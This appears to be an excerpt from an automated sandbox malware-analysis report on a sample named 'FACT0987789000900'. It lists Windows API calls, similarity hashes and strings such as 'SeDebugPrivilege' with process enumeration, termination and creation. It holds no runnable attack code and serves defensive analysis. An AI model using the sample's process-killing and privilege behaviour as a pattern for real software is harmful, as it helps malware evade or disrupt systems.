                                                                                                                • String ID:
                                                                                                                • API String ID: 1241431887-3916222277
                                                                                                                • Opcode ID: 21ed8ca2370ab777d532961f6ed31bec80c885603e8adfd9b2802f6e74aa4913
                                                                                                                • Instruction ID: ab3f4d23bfbc4242cedffb6b61b139a79e5404d45b779639c9b4628760d36de7
                                                                                                                • Opcode Fuzzy Hash: 21ed8ca2370ab777d532961f6ed31bec80c885603e8adfd9b2802f6e74aa4913
                                                                                                                • Instruction Fuzzy Hash: D34180B1500204BFEB119F61CC89FFB77ACFF49315F00401AFA059A181D77899449BA8
                                                                                                                APIs
                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0052DC00), ref: 004EB715
                                                                                                                • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0052DC00), ref: 004EB749
                                                                                                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 004EB8C1
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 004EB8EB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                • String ID:
                                                                                                                • API String ID: 560350794-0
                                                                                                                • Opcode ID: 788454327095b324498c4c3a5394544f7bee41f090a4f986b389768cfd4ef777
                                                                                                                • Instruction ID: 64fea2dd3c358dc4675354243361bbc9f5a04df9467d38506d771d35b7fbc509
                                                                                                                • Opcode Fuzzy Hash: 788454327095b324498c4c3a5394544f7bee41f090a4f986b389768cfd4ef777
                                                                                                                • Instruction Fuzzy Hash: CFF13C71A00209EFCF04DF95C884EAEB7B9FF49315F1084AAF905AB250DB35AD45CB94
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 004F24F5
                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004F2688
                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004F26AC
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004F26EC
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004F270E
                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 004F286F
                                                                                                                • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 004F28A1
                                                                                                                • CloseHandle.KERNEL32(?), ref: 004F28D0
                                                                                                                • CloseHandle.KERNEL32(?), ref: 004F2947
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 4090791747-0
                                                                                                                • Opcode ID: 4e4efd94aa1838cb2d7638b469e5c3b9a7a124e8aecea250949aa8c76f0aa034
                                                                                                                • Instruction ID: aadb8b81d59778192fe97ae0f7c495e33ea1fec39fcea561e595350a7bc9ddfd
                                                                                                                • Opcode Fuzzy Hash: 4e4efd94aa1838cb2d7638b469e5c3b9a7a124e8aecea250949aa8c76f0aa034
                                                                                                                • Instruction Fuzzy Hash: 9BD1DF31604200DFCB14EF25C591A6ABBE0BF89314F14856EF9899B3A2DB79DC44CB5A
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004AB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,004AB759,?,00000000,?,?,?,?,004AB72B,00000000,?), ref: 004ABA58
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,004AB72B), ref: 004AB7F6
                                                                                                                • KillTimer.USER32(00000000,?,00000000,?,?,?,?,004AB72B,00000000,?,?,004AB2EF,?,?), ref: 004AB88D
                                                                                                                • DestroyAcceleratorTable.USER32(00000000), ref: 0050D8A6
                                                                                                                • DeleteObject.GDI32(00000000), ref: 0050D91C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2402799130-0
                                                                                                                • Opcode ID: 62f11d49ce4ca1a8f2ef63629a1f87ffc0e3691250555ccd3ec4ab0c989aca96
                                                                                                                • Instruction ID: a05322ba77f3355e253c48e2359989ebd3f4df58b0687fa0b2f8f03a1fd57b98
                                                                                                                • Opcode Fuzzy Hash: 62f11d49ce4ca1a8f2ef63629a1f87ffc0e3691250555ccd3ec4ab0c989aca96
                                                                                                                • Instruction Fuzzy Hash: D261C130500B00DFDB259F58D898B29BBF5FF76316F14441EE04246AB1C778A884EF98
                                                                                                                APIs
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004FB3F4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InvalidateRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 634782764-0
                                                                                                                • Opcode ID: 742f26f8fe98a48f365f6009eb1c4f51db798da8af8738af491677d46d8407eb
                                                                                                                • Instruction ID: 3254bf3ee14a54f09a3d948f28502de04c6f11f51735f1d0caf3a02b2f04e9e7
                                                                                                                • Opcode Fuzzy Hash: 742f26f8fe98a48f365f6009eb1c4f51db798da8af8738af491677d46d8407eb
                                                                                                                • Instruction Fuzzy Hash: 1F51C23154020CBBEF209F29CC85BBA3B65EB06318F648117FB15D66E2C779E9409AD9
                                                                                                                APIs
                                                                                                                • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0050DB1B
                                                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0050DB3C
                                                                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0050DB51
                                                                                                                • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0050DB6E
                                                                                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0050DB95
                                                                                                                • DestroyCursor.USER32(00000000), ref: 0050DBA0
                                                                                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0050DBBD
                                                                                                                • DestroyCursor.USER32(00000000), ref: 0050DBC8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3992029641-0
                                                                                                                • Opcode ID: 87d40f497bf124a9a33eb012a6e6fa58e71e49830729b1d6d0b03064397387a6
                                                                                                                • Instruction ID: 313bbbeb9be0664a5dfce8e2f8a55a0d74cd553dc77a45d5ac4b15fe16be3488
                                                                                                                • Opcode Fuzzy Hash: 87d40f497bf124a9a33eb012a6e6fa58e71e49830729b1d6d0b03064397387a6
                                                                                                                • Instruction Fuzzy Hash: FF518A34600208EFDB20DF69CC91FAA7BB5BB29354F10451AF9469A2D0D7B4EC90DB65
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004D6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004D5FA6,?), ref: 004D6ED8
                                                                                                                  • Part of subcall function 004D6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,004D5FA6,?), ref: 004D6EF1
                                                                                                                  • Part of subcall function 004D72CB: GetFileAttributesW.KERNEL32(?,004D6019), ref: 004D72CC
                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 004D75CA
                                                                                                                • _wcscmp.LIBCMT ref: 004D75E2
                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 004D75FB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                • String ID:
                                                                                                                • API String ID: 793581249-0
                                                                                                                • Opcode ID: 614835ff346ce10ed5d9bce1e5baedc2d77adfd04c7b626e29a330337d125816
                                                                                                                • Instruction ID: 4fc4d7a6f57d1778d14692043bb1ce948aeae781bf1aa0bbb3aac2ab28304368
                                                                                                                • Opcode Fuzzy Hash: 614835ff346ce10ed5d9bce1e5baedc2d77adfd04c7b626e29a330337d125816
                                                                                                                • Instruction Fuzzy Hash: 295130B2A092195ADF54EB94D8919DE73BC9F08324B0044AFF605E3641EB78D7C9CB78
                                                                                                                APIs
                                                                                                                • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0050DAD1,00000004,00000000,00000000), ref: 004AEAEB
                                                                                                                • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0050DAD1,00000004,00000000,00000000), ref: 004AEB32
                                                                                                                • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0050DAD1,00000004,00000000,00000000), ref: 0050DC86
                                                                                                                • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0050DAD1,00000004,00000000,00000000), ref: 0050DCF2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ShowWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1268545403-0
                                                                                                                • Opcode ID: f7d78ac5f53652b3eb4805518ebc928b4979576cecc36680834d760808e34f5d
                                                                                                                • Instruction ID: 6d6a98837c0ca3f73f91805cf2add84047dd79e2ddd7765d5c355c14079e9587
                                                                                                                • Opcode Fuzzy Hash: f7d78ac5f53652b3eb4805518ebc928b4979576cecc36680834d760808e34f5d
                                                                                                                • Instruction Fuzzy Hash: 894117302056809AE735DB2A898DB7F7EB6BB73304F19480FE06746AA1C6787C45D339
                                                                                                                APIs
                                                                                                                • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,004CAEF1,00000B00,?,?), ref: 004CB26C
                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,004CAEF1), ref: 004CB273
                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,004CAEF1,00000B00,?,?), ref: 004CB288
                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,004CAEF1,00000B00,?,?), ref: 004CB290
                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,004CAEF1,00000B00,?,?), ref: 004CB293
                                                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,004CAEF1,00000B00,?,?), ref: 004CB2A3
                                                                                                                • GetCurrentProcess.KERNEL32(004CAEF1,00000000,?,004CAEF1,00000B00,?,?), ref: 004CB2AB
                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,004CAEF1,00000B00,?,?), ref: 004CB2AE
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,004CB2D4,00000000,00000000,00000000), ref: 004CB2C8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1422014791-0
                                                                                                                • Opcode ID: b05c99c5b6b34ffd1e812a6761f3b417b5a20bb78fca95775b4107dd3268fa8a
                                                                                                                • Instruction ID: 51ea7fa4ed96b0e1616118aa813bcacf85d73eb9709300d357751de0abac9c34
                                                                                                                • Opcode Fuzzy Hash: b05c99c5b6b34ffd1e812a6761f3b417b5a20bb78fca95775b4107dd3268fa8a
                                                                                                                • Instruction Fuzzy Hash: 7F01BBB5240304BFE710ABA5DC4DFAB7BACEB98711F018411FA15DB1A1CAB59804DB71
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                • API String ID: 0-572801152
                                                                                                                • Opcode ID: bad652e9bef712e6eeed10de7122b8a06ea9b237a105224349b33f9b28d97b88
                                                                                                                • Instruction ID: be28c17469c8a6b9e6cc454bb101a924b2a2fda5af6dd884f3e620641c916015
                                                                                                                • Opcode Fuzzy Hash: bad652e9bef712e6eeed10de7122b8a06ea9b237a105224349b33f9b28d97b88
                                                                                                                • Instruction Fuzzy Hash: 87E1E571A0025AABDF14DFA6C981AEF77B5FF48315F14402EE905A7380D778AD42CB98
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004D6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004D6554
                                                                                                                  • Part of subcall function 004D6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 004D6564
                                                                                                                  • Part of subcall function 004D6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 004D65F9
                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004F179A
                                                                                                                • GetLastError.KERNEL32 ref: 004F17AD
                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004F17D9
                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 004F1855
                                                                                                                • GetLastError.KERNEL32(00000000), ref: 004F1860
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004F1895
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                • String ID: SeDebugPrivilege
                                                                                                                • API String ID: 2533919879-2896544425
                                                                                                                • Opcode ID: 6a0fc8d43f1a91b733aace85c6bbd75790c548a7e7b2cf4dce4bdf56539981ad
                                                                                                                • Instruction ID: 1b4e7aa701cd43b0577929a056628d15eb59dc0edd229bf7df8a5a3c24b81c8b
                                                                                                                • Opcode Fuzzy Hash: 6a0fc8d43f1a91b733aace85c6bbd75790c548a7e7b2cf4dce4bdf56539981ad
                                                                                                                • Instruction Fuzzy Hash: 2841DD31600204AFDB05EF59C9A5FBEB7A1AF14314F04805EFA069F3D2DBB9A904CB59
                                                                                                                APIs
                                                                                                                • LoadIconW.USER32(00000000,00007F03), ref: 004D58B8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconLoad
                                                                                                                • String ID: blank$info$question$stop$warning
                                                                                                                • API String ID: 2457776203-404129466
                                                                                                                • Opcode ID: 9f394e5d7531148c620b5b9848da50e2fd24723bbf16f71ff266d7fd1ca0ecff
                                                                                                                • Instruction ID: 630e0b7a17c3aba2a83e91389e693957bf630490d86a4f8fb0d3f1b4526c7570
                                                                                                                • Opcode Fuzzy Hash: 9f394e5d7531148c620b5b9848da50e2fd24723bbf16f71ff266d7fd1ca0ecff
                                                                                                                • Instruction Fuzzy Hash: 1C110D31709743BEEB056B559C92DFB67ACAF25318B20003BF501E6381EFA8AA11527D
                                                                                                                APIs
                                                                                                                • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 004DA806
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ArraySafeVartype
                                                                                                                • String ID:
                                                                                                                • API String ID: 1725837607-0
                                                                                                                • Opcode ID: d9fafc56141a97eec6f81676d51041558fc37314252f9288065797225b7f0c74
                                                                                                                • Instruction ID: d1cd98160a8bbb50e49f05a24d3680297d5ac8369c9623c97281eafe351e7dbe
                                                                                                                • Opcode Fuzzy Hash: d9fafc56141a97eec6f81676d51041558fc37314252f9288065797225b7f0c74
                                                                                                                • Instruction Fuzzy Hash: ECC19D75A0020A9FDB00DF94C4A1BAEB7F4FF09314F24846BE605E7341D778A956CB9A
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 004D6B63
                                                                                                                • LoadStringW.USER32(00000000), ref: 004D6B6A
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004D6B80
                                                                                                                • LoadStringW.USER32(00000000), ref: 004D6B87
                                                                                                                • _wprintf.LIBCMT ref: 004D6BAD
                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004D6BCB
                                                                                                                Strings
                                                                                                                • %s (%d) : ==> %s: %s %s, xrefs: 004D6BA8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
